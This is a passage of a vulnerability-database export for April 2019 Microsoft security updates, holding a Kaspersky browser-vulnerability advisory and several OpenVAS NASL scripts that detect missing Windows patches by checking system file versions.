*Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft browsers. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nInternet Explorer 10 \nInternet Explorer 11 \nInternet Explorer 9 \nMicrosoft Edge\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-0860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0860>) \n[CVE-2019-0829](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0829>) \n[CVE-2019-0764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0764>) \n[CVE-2019-0752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0752>) \n[CVE-2019-0739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0739>) \n[CVE-2019-0862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0862>) \n[CVE-2019-0833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0833>) \n[CVE-2019-0806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0806>) \n[CVE-2019-0835](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0835>) \n[CVE-2019-0861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0861>) \n[CVE-2019-0810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0810>) \n[CVE-2019-0812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0812>) \n[CVE-2019-0753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0753>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2019-0829](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0829>)0.0Unknown \n[CVE-2019-0806](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0806>)0.0Unknown \n[CVE-2019-0810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0810>)0.0Unknown \n[CVE-2019-0812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0812>)0.0Unknown \n[CVE-2019-0860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0860>)0.0Unknown \n[CVE-2019-0739](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0739>)0.0Unknown \n[CVE-2019-0861](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0861>)0.0Unknown \n[CVE-2019-0764](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0764>)0.0Unknown \n[CVE-2019-0752](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0752>)0.0Unknown \n[CVE-2019-0862](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0862>)0.0Unknown \n[CVE-2019-0833](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0833>)0.0Unknown \n[CVE-2019-0835](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0835>)0.0Unknown \n[CVE-2019-0753](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0753>)0.0Unknown", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2019-04-09T00:00:00", "id": "KLA11462", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11462", "title": "\r KLA11462Multiple vulnerabilities in Microsoft Browsers ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-07-21T20:40:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0846", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0859", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0856", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing an important security\n update according to Microsoft KB4493451", "modified": "2020-07-17T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815036", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815036", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493451)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815036\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2019-0671\", \"CVE-2019-0673\", \"CVE-2019-0674\", \"CVE-2019-0688\",\n \"CVE-2019-0730\", \"CVE-2019-0731\", \"CVE-2019-0732\", \"CVE-2019-0735\",\n \"CVE-2019-0752\", \"CVE-2019-0753\", \"CVE-2019-0764\", \"CVE-2019-0790\",\n \"CVE-2019-0791\", \"CVE-2019-0792\", \"CVE-2019-0793\", \"CVE-2019-0794\",\n \"CVE-2019-0795\", \"CVE-2019-0796\", \"CVE-2019-0802\", \"CVE-2019-0803\",\n \"CVE-2019-0805\", \"CVE-2019-0835\", \"CVE-2019-0836\", \"CVE-2019-0838\",\n \"CVE-2019-0839\", \"CVE-2019-0842\", \"CVE-2019-0844\", \"CVE-2019-0845\",\n \"CVE-2019-0846\", \"CVE-2019-0847\", \"CVE-2019-0848\", \"CVE-2019-0849\",\n \"CVE-2019-0851\", \"CVE-2019-0853\", \"CVE-2019-0856\", \"CVE-2019-0859\",\n \"CVE-2019-0862\", \"CVE-2019-0877\", \"CVE-2019-0879\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 13:00:26 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493451)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4493451\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the\n target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft Office Access Connectivity Engine improperly handles objects in memory.\n\n - Windows Client Server Run-Time Subsystem (CSRSS) improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, gain elevated privileges, bypass security features and\n read sensitive information on a victim system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493451\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22724\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.2.9200.22724\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2017-5753", "CVE-2019-0848", "CVE-2017-5754", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0846", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0847", "CVE-2019-0793", "CVE-2019-0764", "CVE-2017-5715", "CVE-2019-0859", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0856", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing a critical security\n update according to Microsoft KB4493472", "modified": "2020-07-17T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815033", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815033", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493472)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815033\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2017-5753\", \"CVE-2017-5715\", \"CVE-2017-5754\", \"CVE-2019-0671\",\n \"CVE-2019-0673\", \"CVE-2019-0674\", \"CVE-2019-0730\", \"CVE-2019-0731\",\n \"CVE-2019-0732\", \"CVE-2019-0735\", \"CVE-2019-0752\", \"CVE-2019-0753\",\n \"CVE-2019-0764\", \"CVE-2019-0791\", \"CVE-2019-0792\", \"CVE-2019-0793\",\n \"CVE-2019-0794\", \"CVE-2019-0795\", \"CVE-2019-0796\", \"CVE-2019-0802\",\n \"CVE-2019-0803\", \"CVE-2019-0805\", \"CVE-2019-0835\", \"CVE-2019-0836\",\n \"CVE-2019-0838\", \"CVE-2019-0839\", \"CVE-2019-0842\", \"CVE-2019-0844\",\n \"CVE-2019-0845\", \"CVE-2019-0846\", \"CVE-2019-0847\", \"CVE-2019-0848\",\n \"CVE-2019-0849\", \"CVE-2019-0851\", \"CVE-2019-0853\", \"CVE-2019-0856\",\n \"CVE-2019-0859\", \"CVE-2019-0862\", \"CVE-2019-0877\", \"CVE-2019-0879\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 09:14:49 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493472)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4493472\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on\n the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist in,\n\n - The IOleCvt interface improperly renders ASP webpage content.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - The win32k component improperly provides kernel information.\n\n - Speculative execution side-channel vulnerabilities.\n\n - Error in Various Windows components.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n an attacker to execute arbitrary code on a victim system, obtain information to\n further compromise the user's system, gain elevated privileges, bypass security\n features and cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493472\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\ndllPath = smb_get_system32root();\nif(!dllPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:dllPath, file_name:\"Ntdll.dll\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24408\")) {\n report = report_fixed_ver(file_checked:dllPath + \"\\Ntdll.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24408\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:40:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2017-5753", "CVE-2019-0848", "CVE-2017-5754", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0846", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2017-5715", "CVE-2019-0859", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0856", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing a critical security\n update according to Microsoft KB4493446", "modified": "2020-07-17T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815034", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815034", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493446)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815034\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2017-5753\", \"CVE-2017-5715\", \"CVE-2017-5754\", \"CVE-2019-0671\",\n \"CVE-2019-0673\", \"CVE-2019-0674\", \"CVE-2019-0688\", \"CVE-2019-0730\",\n \"CVE-2019-0731\", \"CVE-2019-0732\", \"CVE-2019-0735\", \"CVE-2019-0752\",\n \"CVE-2019-0753\", \"CVE-2019-0764\", \"CVE-2019-0790\", \"CVE-2019-0791\",\n \"CVE-2019-0792\", \"CVE-2019-0793\", \"CVE-2019-0794\", \"CVE-2019-0795\",\n \"CVE-2019-0796\", \"CVE-2019-0802\", \"CVE-2019-0803\", \"CVE-2019-0805\",\n \"CVE-2019-0835\", \"CVE-2019-0836\", \"CVE-2019-0838\", \"CVE-2019-0839\",\n \"CVE-2019-0842\", \"CVE-2019-0844\", \"CVE-2019-0845\", \"CVE-2019-0846\",\n \"CVE-2019-0847\", \"CVE-2019-0848\", \"CVE-2019-0849\", \"CVE-2019-0851\",\n \"CVE-2019-0853\", \"CVE-2019-0856\", \"CVE-2019-0859\", \"CVE-2019-0862\",\n \"CVE-2019-0877\", \"CVE-2019-0879\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 09:14:49 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493446)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4493446\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on\n the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists\n\n - When Windows Task Scheduler improperly discloses credentials to Windows\n Credential Manager.\n\n - When Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - When Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle\n objects in memory.\n\n - When Microsoft XML Core Services MSXML parser processes user input.\n\n - Speculative execution side-channel vulnerabilities.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to elevate privileges, execute arbitrary code, read unauthorized\n information and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493446\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.19328\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.3.9600.19328\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T16:27:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0812", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0859", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0671", "CVE-2019-0849", "CVE-2019-0674", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "description": "This host is missing a critical security\n update according to Microsoft KB4493475", "modified": "2020-06-04T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310815023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815023", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4493475)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815023\");\n script_version(\"2020-06-04T09:02:37+0000\");\n script_cve_id(\"CVE-2019-0688\", \"CVE-2019-0730\", \"CVE-2019-0848\", \"CVE-2019-0849\",\n \"CVE-2019-0851\", \"CVE-2019-0731\", \"CVE-2019-0732\", \"CVE-2019-0735\",\n \"CVE-2019-0853\", \"CVE-2019-0856\", \"CVE-2019-0739\", \"CVE-2019-0752\",\n \"CVE-2019-0753\", \"CVE-2019-0764\", \"CVE-2019-0859\", \"CVE-2019-0860\",\n \"CVE-2019-0861\", \"CVE-2019-0862\", \"CVE-2019-0790\", \"CVE-2019-0791\",\n \"CVE-2019-0877\", \"CVE-2019-0879\", \"CVE-2019-0792\", \"CVE-2019-0793\",\n \"CVE-2019-0794\", \"CVE-2019-0795\", \"CVE-2019-0796\", \"CVE-2019-0806\",\n \"CVE-2019-0810\", \"CVE-2019-0812\", \"CVE-2019-0835\", \"CVE-2019-0836\",\n \"CVE-2019-0838\", \"CVE-2019-0839\", \"CVE-2019-0842\", \"CVE-2019-0844\",\n \"CVE-2019-0845\", \"CVE-2019-0846\", \"CVE-2019-0847\", \"CVE-2019-0802\",\n \"CVE-2019-0803\", \"CVE-2019-0805\", \"CVE-2019-0673\", \"CVE-2019-0674\",\n \"CVE-2019-0671\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 09:02:37 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 09:51:49 +0530 (Wed, 10 Apr 2019)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4493475)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4493475\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - The IOleCvt interface improperly renders ASP webpage content.\n\n - An error in the scripting engine which handles objects in memory in Internet Explorer.\n\n - Windows improperly handles calls to the LUAFV driver.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Client Server Run-Time Subsystem (CSRSS) fails to properly handle\n objects in memory.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - OLE automation improperly handles objects in memory.\n\n - Windows Task Scheduler improperly discloses credentials to Windows Credential\n Manager.\n\n - Terminal Services component improperly discloses the contents of its memory.\n\n - The Win32k component fails to properly handle objects in memory.\n\n - The win32k component improperly provides kernel information.\n\n - Windows Jet Database Engine improperly handles objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Microsoft browsers do not properly validate input under specific conditions.\n\n - An error in the Microsoft Server Message Block (SMB) Server when an attacker\n with valid credentials attempts to open a specially crafted file over the SMB\n protocol on the same machine.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, disclose sensitive information and compromise the user's\n system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4493475\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.18185\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.18185\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T12:52:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0814", "CVE-2019-0812", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0859", "CVE-2019-0673", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0685", "CVE-2019-0730", "CVE-2019-0735", 